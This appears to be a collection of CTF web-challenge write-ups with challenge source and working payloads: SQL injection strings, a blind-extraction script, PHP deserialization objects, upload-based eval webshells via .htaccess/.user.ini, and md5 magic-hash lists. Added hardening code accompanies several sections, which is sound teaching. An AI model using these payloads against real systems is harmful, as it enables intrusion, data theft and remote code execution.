O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
no=-1%20union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27
PD9waHANCg0KJGZsYWcgPSAiZmxhZ3syOTkxM2UxYy0wZDllLTQ2OWEtYTEyNS0xZWZhOGUzMWYxMzF9IjsNCmV4aXQoMCk7DQo=
base64 decoding gives the same content
<?php $flag = "flag{29913e1c-0d9e-469a-a125-1efa8e31f131}"; exit(0);
load_file can also read it directly
no=-1 union/**/select 1,group_concat(load_file('/var/www/html/flag.php')),3,4 from users #
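The file:// read works because UserInfo::get() accepts any scheme and the blog value arrives from the database, not from the registration form that isValidBlog() guards. As an added example (my code, not the challenge's), the fetch with a scheme allowlist enforced at fetch time; timeouts and probe URLs are constructed:

```php
<?php
// Added example, not the challenge's code. The serialized UserInfo is written
// into users.data through the injection, so a check that runs only at
// registration never sees the file:// URL. Validate where the fetch happens,
// and tell libcurl itself which schemes it may use.

function allowedBlogUrl(string $url): bool
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;                       // file:///... has no host component
    }
    return in_array(strtolower($p['scheme']), ['http', 'https'], true);
}

function fetchBlog(string $url): ?string
{
    if (!allowedBlogUrl($url)) {
        return null;
    }
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL             => $url,
        CURLOPT_RETURNTRANSFER  => true,
        // Scheme allowlist enforced by libcurl for the request and for any
        // redirect target: file://, gopher://, dict:// are refused outright.
        // (This does not by itself stop requests to internal addresses.)
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => true,
        CURLOPT_MAXREDIRS       => 2,
        CURLOPT_CONNECTTIMEOUT  => 3,
        CURLOPT_TIMEOUT         => 5,
    ]);
    $out  = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return ($out === false || $code !== 200) ? null : $out;
}

// Constructed probes, including the blog value from the write-up's payload.
foreach ([
    'file:///var/www/html/flag.php',
    'gopher://127.0.0.1:3306/_x',
    '0.com',
    'https://example.com/',
] as $u) {
    printf("%-32s %s\n", $u, allowedBlogUrl($u) ? 'fetchable' : 'rejected');
}
```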
[CISCN2019 华北赛区 Day2 Web1]Hack World Quick testing, ran a wordlist
When id is 1 or 2 the query returns:
id=1 => Hello, glzjin wants a girlfriend.
id=2 => Do you want to be my girlfriend?
When id is any other number, or @, the response is Error Occured When Fetch Result.
When id is or, and, from, like, insert, delect, update, select or sleep, the response is bool(false)
When id is --+, information, information_schema, separator, floor or xor, the response is SQL Injection Checked.
Try
id=if(length((select(flag)from(flag)))=42,1,0)
Response: Hello, glzjin wants a girlfriend.
Confirms the flag is 42 characters long
Binary search brute force; the binary search script from inanb:
import requests
import time

url = 'http://2bd5e0bf-74ef-4b72-90b8-315541a82d9d.node3.buuoj.cn/'
flag = ""
for x in range(1, 43):
    l = 32
    r = 126
    while r > l:
        mid = int((l + r + 1) / 2)
        x = str(x)
        y = str(mid)
        id = {"id": 'if(ascii(substr((select(flag)from(flag)),' + x + ',1))>=' + y + ',1,0)'}
        response = requests.post(url=url, data=id)
        if "Hello" in response.text:
            l = mid
        else:
            r = mid - 1
        time.sleep(0.03)
    flag += (chr(int(r)))
    print(chr(int(r)))
print(flag)
[GYCTF2020]Blacklist Union injection
error 1054 : Unknown column '3' in 'order clause'
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
Stacked injection
array(1) { [0]=> string(8) "FlagHere" } array(1) { [0]=> string(5) "words" }
array(6) { [0]=> string(4) "flag" [1]=> string(12) "varchar(100)" [2]=> string(2) "NO" [3]=> string(0) "" [4]=> NULL [5]=> string(0) "" }
HANDLER query, like [强网杯 2019]随便注, but set, prepare, alter and rename are filtered
Use the HANDLER statement instead
-1';handler FlagHere open;handler FlagHere read first;handler FlagHere close; #
[GXYCTF2019]BabySQli
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);
if(preg_match("/\(|\)|\=|or/", $name)){
    die("do not hack me!");
}
else{
    if (!$result) {
        printf("Error: %s\n", mysqli_error($con));
        exit();
    }
    else{
        // echo '<pre>';
        $arr = mysqli_fetch_row($result);
        // print_r($arr);
        if($arr[1] == "admin"){
            if(md5($password) == $arr[2]){
                echo $flag;
            }
            else{
                die("wrong pass!");
            }
        }
        else{
            die("wrong user!");
        }
    }
}
hint MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
base32 decode
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
base64 decode
select * from user where username = '$name'
Found that the username is admin
Fuzzing shows ( ) = or xor order and similar keywords are filtered
The second column is the username, the third is the MD5 of the password
name=' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' #&pw=admin
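The login above concatenates the username into SQL and then compares md5 strings with ==, which is what the union payload exploits. As an added example (my code, not the challenge's), the same login with a bound parameter and a password hash; connection details and the PHP 7.4+/mysqlnd requirements are assumptions:

```php
<?php
// Added example, not the challenge's code. With a bound parameter the username
// travels separately from the SQL text, so
//   ' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' #
// is just a username that does not exist, and the keyword denylist on
// ( ) = or becomes unnecessary. Assumes PHP 7.4+ and mysqlnd (get_result()).

function connect(): mysqli
{
    $con = new mysqli('127.0.0.1', 'app', 'secret', 'app');   // assumed credentials
    $con->set_charset('utf8mb4');                             // replaces SET NAMES
    return $con;
}

function login(mysqli $con, string $name, string $password): bool
{
    $stmt = $con->prepare('SELECT username, password FROM user WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $name);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // The password column holds password_hash() output, not md5 hex, so there
    // is no string of digits for == to misread and nothing a union row could
    // forge without the bcrypt secret. Unknown users burn the same cost.
    static $dummy = null;
    $dummy ??= password_hash('dummy', PASSWORD_DEFAULT);
    if ($row === null) {
        password_verify($password, $dummy);
        return false;
    }
    return password_verify($password, $row['password']);
}

// Registration side, for completeness: never store md5($password).
function createUser(mysqli $con, string $name, string $password): bool
{
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $con->prepare('INSERT INTO user (username, password) VALUES (?, ?)');
    $stmt->bind_param('ss', $name, $hash);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

$con = connect();
// The write-up's payload, now just an unknown username: false.
var_dump(login($con, "' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' #", 'admin'));
```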
[网鼎杯 2020 青龙组]AreUSerialz
<?php
include("flag.php");
highlight_file(__FILE__);

class FileHandler {
    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }
}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}
is_valid restricts every character to ASCII 32-125 (printable), but a protected property serializes with the marker \00*\00 in front of its name, where \00 is the null byte
PHP 7.1+ ignores the property visibility when unserializing, so public properties can replace the protected ones
__destruct needs the strict comparison bypassed: use op=" 2" or op=2
<?php
class FileHandler {
    public $op = " 2";
    public $filename = "flag.php";
    public $content = "";
}
echo serialize(new FileHandler());
?>
?str=O:11:"FileHandler":3:{s:2:"op";s:4:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:0:"";}
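is_valid() only filters bytes; the object graph itself is never constrained. As an added example (my code, not the challenge's), what unserialize()'s allowed_classes option does to the payload above; FileHandler is reduced to a destructor that only leaves a trace, with public properties for brevity:

```php
<?php
// Added example, not the challenge's code. The destructor here only records
// that it ran; the real one reads $this->filename. Public properties are used
// because, as the write-up notes, visibility no longer matters on PHP 7.1+.

class FileHandler {
    public $op = "1";
    public $filename = "/tmp/tmpfile";
    public $content = "Hello World!";
    function __destruct() {
        $GLOBALS['destructors'][] = get_class($this) . ':' . $this->filename;
    }
}

function is_valid(string $s): bool {           // the challenge's filter, unchanged
    for ($i = 0; $i < strlen($s); $i++)
        if (!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) return false;
    return true;
}

// The payload from the write-up.
const PAYLOAD = 'O:11:"FileHandler":3:{s:2:"op";s:4:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:0:"";}';

// As written: any class named in the string is instantiated, so its destructor runs.
function loadAsWritten(string $str) {
    return is_valid($str) ? unserialize($str) : null;
}

// Hardened: no class may be instantiated. The data still round-trips, as a
// __PHP_Incomplete_Class whose destructor is PHP's own no-op, not FileHandler's.
// (For plain data, json_decode() is the better carrier: it has no object graph.)
function loadHardened(string $str): ?array {
    if (!is_valid($str)) return null;
    $o = @unserialize($str, ['allowed_classes' => false]);
    return $o instanceof __PHP_Incomplete_Class ? (array) $o : null;
}

$GLOBALS['destructors'] = [];
$a = loadAsWritten(PAYLOAD);
unset($a);                                          // FileHandler::__destruct fires
$b = loadHardened(PAYLOAD);
var_dump($b['op'] ?? null, $b['filename'] ?? null); // " 2", "flag.php": data only
unset($b);                                          // nothing of ours runs here
var_dump($GLOBALS['destructors']);                  // ["FileHandler:flag.php"], exactly once
```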
[MRCTF2020]Ez_bypass
<?php
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd)) {
                if($passwd==1234567) {
                    echo 'Good Job!';
                    highlight_file('flag.php');
                    die('By Retr_0');
                }
                else {
                    echo "can you think twice??";
                }
            }
            else{
                echo 'You can not get it !';
            }
        }
        else{
            die('only one way to get the flag');
        }
    }
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
Arrays bypass the strict comparison: ?id[]=0&gg[]=1
A trailing letter or %00 bypasses is_numeric: passwd=1234567a
passwd=1234567%00
[MRCTF2020]你传你🐎呢 .htaccess
Change the Content-Type
/var/www/html/upload/315f3ebf1b34561a6edd5834019ba782/.htaccess succesfully uploaded!
One-line webshell
Change the Content-Type
/var/www/html/upload/315f3ebf1b34561a6edd5834019ba782/ba2in9a-php.webp succesfully uploaded!
ba2in9a=var_dump(scandir("/"));
ba2in9a=var_dump(file_get_contents("/flag"));
[极客大挑战 2019]HardSQL Fuzzing shows these are filtered: ! & * + < > = | \\ if and union drop having mid sleep hex char ascii substr greatest, among other keywords
Error-based injection; basic database info: 'or(updatexml(1,concat(0x7e,version(),0x7e),1))#
XPATH syntax error: '10.3.18-MariaDB'
'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
XPATH syntax error: 'geek'
Tables: 'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
XPATH syntax error: 'H4rDsq1'
Columns: 'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
XPATH syntax error: 'id,username,password'
Data: 'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
XPATH syntax error: 'flagflag{db016904-4690-4025-94'
Note: updatexml() shows only 32 characters; when the data is longer, combine it with right()
'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,30))))from(H4rDsq1)),0x7e),1))#
XPATH syntax error: '4-4690-4025-94c4-f546273a2d1e}'
[SUCTF 2019]CheckIn
<?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {
    mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    if (!$tmp_name) {
        die("filesize too big!");
    }
    if (!$name) {
        die("filename cannot be empty!");
    }
    $extension = substr($name, strrpos($name, ".") + 1);
    if (preg_match("/ph|htacess/i", $extension)) {
        die("illegal suffix!");
    }
    if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
        die("<? in contents!");
    }
    $image_type = exif_imagetype($tmp_name);
    if (!$image_type) {
        die("exif_imagetype:not image!");
    }
    $upload_file_path = $userdir . "/" . $name;
    move_uploaded_file($tmp_name, $upload_file_path);
    echo "Your dir " . $userdir. ' <br>';
    echo 'Your files : <br>';
    var_dump(scandir($userdir));
}
.user.ini: auto_prepend_file is parsed and included before the main file
auto_append_file is parsed and included after the main file
exif_imagetype: a GIF89a file header satisfies exif_imagetype
.user.ini
GIF89a? auto_append_file=ba2in9a-asp.webp
ba2in9a-asp.webp
GIF89a? <script language="php">eval($_POST['ba2in9a']);</script>
List the root directory
ba2in9a=var_dump(scandir("/"));
Print the file contents
ba2in9a=var_dump(file_get_contents("/flag"));
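BabyUpload and CheckIn fall to the same four gaps: a "ph"/"htacess" denylist that lets .htaccess and .user.ini through, a "<?" scan that misses <script language="php">, a magic-byte check satisfied by six bytes, and a client-chosen filename. As an added example (my code, from neither challenge), one upload routine that closes all four; the destination directory, size limit and GD availability are assumptions:

```php
<?php
// Added example, not from either challenge. Extension allowlist instead of a
// denylist, magic bytes that must agree with that extension, a full decode
// instead of a "<?" search, a server-chosen filename, and a re-encode so only
// pixel data is written. Assumes the GD extension; the directory should be
// served with script execution disabled regardless.

const ALLOWED_IMAGES = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                        'png' => 'image/png',  'gif' => 'image/gif'];

function storeImage(string $clientName, string $tmpPath, int $size, string $dir): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($size <= 0 || $size > 2 * 1024 * 1024 || !isset(ALLOWED_IMAGES[$ext])) {
        return null;   // .htaccess, .user.ini, .phtml, .webp never get this far
    }
    // Magic bytes must match the declared extension (not the Content-Type
    // header, which the client sets and the write-ups simply edit).
    $type = @exif_imagetype($tmpPath);
    if ($type === false || image_type_to_mime_type($type) !== ALLOWED_IMAGES[$ext]) {
        return null;
    }
    // Full decode: a header with no image behind it is rejected here.
    $img = @imagecreatefromstring((string) file_get_contents($tmpPath));
    if ($img === false) {
        return null;
    }
    // Server-chosen name: no client byte ever reaches the filesystem path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;
    // Re-encode: comments, EXIF and any text hidden in a valid image do not survive.
    switch ($ext) {
        case 'png': $ok = imagepng($img, $dest); break;
        case 'gif': $ok = imagegif($img, $dest); break;
        default:    $ok = imagejpeg($img, $dest, 90); break;
    }
    imagedestroy($img);
    return $ok ? $name : null;
}

// Constructed probe: the six magic bytes alone, which is all exif_imagetype() checks.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "GIF89a");
var_dump(exif_imagetype($tmp) === IMAGETYPE_GIF);                          // true
var_dump(storeImage('x.gif', $tmp, filesize($tmp), sys_get_temp_dir()));   // NULL: decode fails
var_dump(storeImage('.htaccess', $tmp, filesize($tmp), sys_get_temp_dir())); // NULL: no extension match
unlink($tmp);
```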
[ZJCTF 2019]NiZhuanSiWei
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit();
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>
data://: supply the required content through the data:// wrapper in text
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
php://filter: read useless.php through the php://filter wrapper
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY&file=php://filter/read=convert.base64-encode/resource=useless.php
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=
<?php
class Flag{  //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
Build the serialized object
<?php
class Flag{
    public $file='flag.php';
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
    }
}
print_r(serialize(new Flag()));
?>
Serialized:
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
payload ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
[BJDCTF2020]Easy MD5 hint: there is a hint in the response header
select * from 'admin' where password=md5($pass,true)
Bypass: injection through the md5 function
String one
md5:
276f722736c95d99e921722cf9ed621c
As raw bytes:
'or'6É]é!r,ùíb 'or'6?]??!r,??b 'or'6ɝ⬹�
Closes the SQL quote and makes the condition always true
String two: 129581926211651571912466741651878684928
md5:
06da5430449f8f6f23dfc1276f722738
As raw bytes:
ÚT0Do#ßÁ'or'8 ?T0D??o#??'or'8 ڔ0D㟁'or'8
Testing this one did not succeed
Source: leveldo4.php also shows that the password is ffifdyop
<?php
error_reporting(0);
$password = $_GET['password'];
if($password == 'ffifdyop') {
    echo "<script>window.location.replace('./levels91.php')</script>";
}
?>
Step two: bypass the loose comparison
levels91.php
<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
    echo "<script>window.location.replace('./levell14.php')</script>";
}
?>
Array bypass: md5 cannot hash an array and returns null, so the two results compare equal
0e bypass: strings whose md5 starts with 0e are compared as numbers in scientific notation, so they are all equal to each other
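The same loose comparison drives WUSTCTF level 2 ($md5 == md5($md5)) and levels91.php here. As an added example (my code, from neither challenge), both checks as written beside a type-strict, constant-time comparison; the probe values are the ones quoted in these write-ups:

```php
<?php
// Added example, not from either challenge. == on two numeric strings compares
// them as numbers, and a digest such as 0e830400451993494058024219903391 is the
// number 0 * 10^N, i.e. 0, so any two "0e<digits>" digests are equal. Arrays are
// the second hole: md5() on an array yields null with a warning on PHP 7 and
// throws a TypeError on PHP 8, so two different arrays compare equal on PHP 7.

function levels91AsWritten($a, $b): bool
{
    return $a != $b && @md5($a) == @md5($b);   // PHP 7 semantics for arrays
}

function level2AsWritten(string $md5): bool
{
    return $md5 == md5($md5);
}

// Hardened: insist on strings first, then compare with hash_equals(), which is
// type-strict (no numeric coercion) and constant-time.
function level2Hardened($md5): bool
{
    return is_string($md5) && hash_equals(md5($md5), $md5);
}

function sameDigest($a, $b): bool
{
    return is_string($a) && is_string($b) && $a !== $b && hash_equals(md5($a), md5($b));
}

// Constructed probes: QNKCDZO and 240610708 both hash to 0e... strings, and
// 0e215962017 hashes to 0e291242476940776845150308577824.
var_dump(levels91AsWritten('QNKCDZO', '240610708'));   // true  (0e... == 0e...)
var_dump(level2AsWritten('0e215962017'));              // true
var_dump(level2Hardened('0e215962017'));               // false: the hex strings differ
var_dump(sameDigest('QNKCDZO', '240610708'));          // false
var_dump(sameDigest(['x'], ['y']));                    // false: arrays rejected up front
```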
hashcatKn0bX5xTgV54:0e239074099038376915511163014383 hashcatfaXyv0NCydC2:00e78170913509171886364696947933 hashcatELKhrlNIlXAz:0ec00053106946393237318089678345 hashcatFZZ1OL8eacJj:0e544759073985063895056720000601 hashcatglCxMkqUOJwD:0e891676190649193842031508414124 hashcatLuQtDnSmdvf4:0e551613790717508526393660811028 hashcatJZ6zKjnDjSmP:0e957569938257781069678186971676 hashcatgcbkcHMJDYfo:0e778781420740711204571028212537 hashcatyEnN0AWDXEJj:00e78652260218430366515810097082 hashcatgEyFYuuwo206:0ed18617980884920471439353879013 hashcatx3Q3sVuRTzZf:0e107806662474608626243242623178 hashcat3iKHJQyTSPzT:0ec38017339220834055407867659893 hashcatnqsky8EaPhZY:0ea54041584253883176394189001413 hashcatj8i4CRvfTn6Q:0e164879675821490800383352471267 hashcatAncod29V4vrB:0eb40162176777666089546818513308 hashcatAI7W4Xf5qMAa:0ed11235495038495675309094002675 hashcatVX5KGaAxO37C:0ee18660142227578830299076471060 hashcatLSevfGjMib7z:0ef94806912787942506104369088120 hashcatweONL6TgUOeX:0e879034299586173661436974677516 hashcataD3Lp5Syji6a:0e535955911746832994456280697563 hashcatZjRe3wVwimeh:0e402537864182105121764499750206 hashcatjic1v8689j6J:0e154499221314249635525178651457 hashcatIZFfBisncyQB:0ec30474031066987435737602946383 hashcattSgs5m7NSzy6:0e249732113617303873999818367704 hashcatZQktzx9ms4ka:0e851827184221990365882765762026 hashcatidLgolWJSzrx:0e760659789811566699476240165608 hashcatSppglsswztvb:0e868690772629271014442727686201 hashcatK5hSQ7iQHm3C:0eb89528718762908134410955812049 hashcatoNfFqC6Io8U1:0e544071674105476245212118785762 hashcatTAIj3dG2G88F:00e21165511946133652979395746247 hashcatde9XUCz98sxF:0e845856619305429905294795223862 hashcatGBree35KhFQl:0e481083164060168518602691315134 hashcatqZjRbZkeVcA2:0e788248204976275056321855467193 hashcatHLj0fmus6oh0:0ea06412255480296796669846331760 hashcatIiW8ezvFBvR7:00e76915435845087660262486971544 hashcatThfyrXoumYcE:0e486802182204901515938066198224 hashcatJwcJRfArcgUR:0e967214930623954488921841383017 
hashcatscGLuTJZjdKQ:0e522399875920163409892231895481 hashcatxgD29e0YtTej:0e844185588819980251553352078116 hashcatF58gxOpeYrJ2:0ed70294867221053172594698800809 hashcatL9VEe5VXcieS:0e043552498983315659673380698314 hashcatgEXSFjwOf6hq:0e221326925297238319205562403775 hashcat8fZi9zfuNZ98:0ea35230842676265549075202368418 hashcatU3UAjuDwmpu0:0ed64473741254375792597617298320 hashcatY8em0aOEpkLK:0e937094300163513903046235959376 hashcataDDoSjnU2gEr:0e078951774517171775068618837762 hashcatHjBj1IelQBLZ:0e950597873615517725342655425676 hashcatTqaIbDrhQes1:0e687068666718182383557043953615 hashcatnzNeorwueIyn:0e065833805870206104769091610143 hashcatdQjcexb8H6yW:0e022232332677582357629641454394 hashcatDuErP07oodqe:0ec22796471841009514558301553023 hashcatv0OjhDmdIGkx:0eb75234122593032202383451028536 hashcatixaDzU1DL0hN:0ef88228580762975171457711268681 hashcatgjlG3p8b0dMS:0ea91354418927530903763416843291 hashcatja8R0AUxKp5j:00e33928319980525556260699609455 hashcatVsKS8jETo43J:0e060623422950460103744994537275 hashcataUpmfeLfShFB:0e566330500563397747235750234034 hashcatbTmlWY6y85KS:0ee13325826707023263360923234976 hashcat4CPdqrLOkjqf:0ee42471186025357978644620703909 hashcatCIG02Qph95e6:0e167336967249208668983353612551 hashcatAl5znMArGpiC:0e679536762501723662842305349946 hashcatwYIe3t1StCJK:0e655099752955237071924454045565 hashcatgzoVmkTOnSPf:0ea86023202885175720452845581289 hashcatjGpLOBeXCg16:0e595165694879612479699744301452 hashcat5J6jMvdHoxlP:0e136280995332446050419927097446 hashcat7ljW6KaYqw1K:0ee82516688966692184934311381550 hashcat1BDHGvGYMVpn:0e404354171460149880658255644172 hashcatTtm5xsugIInK:0e327816715263020551157994642262 hashcatgffFv8hWa3Bl:0e266635146281201862140250013547 hashcati0r5FBiNYeug:0e246045807419548494953409205770 hashcat1kX85sfk0g4y:0e382514914454869222086887708252 hashcat2yHRI4DyHI3O:0ed55522879873085011349168357626 hashcatEyDtfXL7Y1fY:0eb61675251110054878167276702435 hashcatZAziiYBN54kO:0e201680358094517687116416862211 
hashcat9YwTSeIcoWyR:0e851016901835339471421134744975 hashcatAZpOhuyHwv3t:0e303693135179081369436042343152 hashcat9Zx5XNOP2eve:0ec20585657053397619530215202491 hashcatrPYTl27oAW1b:0e159355143480978773319290574673 hashcat2kgoOpUc4fwR:0e780230490671528824082797611528 hashcatqzuB7xm2nNQn:0e988901793080979725482127310981 hashcatHbZQPQtVmt7g:0e698941911873178020764396451394 hashcat0XOCaeslKRC4:0ea94814013347962080571286533377 hashcat7EfaPdccHp3e:0e782617342338981946949215700453 hashcatf5CHc5Ua7eX3:0e225954682674701865093997632794 hashcatC8f6fKPn1Ev4:0ed88663538611463606793395958231 hashcat084aB1jNfFm7:0e845294177040449107929325347217 hashcatCJ0ot3QsFI2Y:0e388018143362098325736722862007 hashcatIoErT0eaTtZB:0e143831420583693880410360244095 hashcatE5octd1IEPqU:0e502531011951351199856979789669 hashcatXe3bkM1Uqlem:0e231249552099511290035202639677 hashcatXegXUjnBVXO8:0e779492206807446206587041280994 hashcatdSUTh3WOcMAN:0e092714162248701627420936647293 hashcatup1DevuyLHVU:0ed12137109383219505409966141389 hashcat2kWBYCw8FFlJ:0e674473628888334961274799092940 hashcatjm0HpCn25n6m:0e375028120331856284970482466281 hashcatP67uhYoQTxfP:0ee53141249730380710998871198253 hashcatoJ5xeiCg2ud3:0e759549138673772424920544629180 hashcatmkUaub25x6wW:0ed22255971426454783711877447657 hashcathW0ZMNE7qnJg:0e205985582557613221903241492011 hashcatfbqddI1qFRB0:0e955027723194091892501346387521 hashcat62OnbSdb8RyK:0ed68392808058140781756758780626 hashcatxfZbCAy0YMgN:0e901604353287709534446331674531 hashcatqY4iTejydkPB:0e258483488531397681824616366109 hashcatyS3HgIEWpsXA:0eb62111644230936795058661270722 hashcatkqmA9CPryWYF:0ea12650160986551639200815067984 hashcatq3ff9hzTIFe3:0e282418944932992681335345024199 hashcatMi9CdKQxlGLC:0eb42133552933644906054620002148 hashcatNXeR8wweyiuB:0e031246576022555463948064271079 hashcatHdTW3tpxOeAN:0ee23945033780919292656782361353 hashcatN4tHddUIwCSR:0e241414596515959326169663249620 hashcate5oO1PIY2VWO:0e887513435583726029415354657328 
hashcatdDqPeYghreF1:00e97567352332036778893575095100 hashcatNQ3srdo89TqR:0ef40558043678942678540609398277 hashcatuyRLzG5tSql8:00e01019827519222036065984234151 hashcatyrz6WebYR99I:0e054022120302530233319321186953 hashcat5PT4B8l3ZwIQ:0e844587058861955318344253198266 hashcatTZPp4mzCjfe0:00e17659033928370024824249533293 hashcat3XMezwudTKx2:0eb70056647889630536931315764399 hashcatpIxzKyPgWbBG:0e937542651226775035719001451190 hashcatH3nn92FIw33B:0e760187464228781676109867521116 hashcatf2rf5xwpMA8B:0e266063893952901864193610970143 hashcatdVW4wpsUmdm0:0e807933395867245185871023013548 hashcatmzNPluBbIkbs:0e388794081078690261059196426709 hashcatb9KqcSlp5Low:0ee63325885559970580972045531729 hashcatc0dszx7fZfwL:0e016116460861295741205884340664 hashcataICBJOELSaEs:0ef85126592610057124451082843381 hashcatX8Vg5pFW8Sry:0e775781379875375077516457565945 hashcattmaxwOgdijVL:0ee76468068080342136181454163345 hashcat7IhrKk6knf4f:0ed75884286971215365437957834074 hashcatBlSGUqgIgQXi:0ea49638074065902363782993554689 hashcatkLu7ANdIeSmi:0e748413228067967993548604059113 hashcatu3m7X8yCv6EU:0ee27341201146515481533443599211 hashcatqk1JmZeG2Cvc:0eb76841431577914691380845365507 hashcatjc8Dd2YtDBoP:0e300289233366943273554537239693 hashcattoZDICrdjJ6C:0ee09972239128093017302916655925 hashcat8lAFNNuNAeFF:0e495532206676849217596564676760 hashcatJTS2dscf6GY7:0ef21544017202086404347513132019 hashcatC1gWDL9dytnI:0ec44203125966605968551343291850 hashcatJbGJDSzaq3AY:0ed38717637142025133390691071043 hashcattCBzi1KkLOlP:0ee68042466377628948785337657469 hashcatKOmKBSvYbfSN:0e800259481444998986692038202429 hashcat2Tyc9TlLhmh1:0e243601382303568196061924271208 hashcatNjg5oupG4Ycp:0ef69572871403570460246727491278 hashcatgkmSJj0f5GUq:0ed19666356276514228255468244335 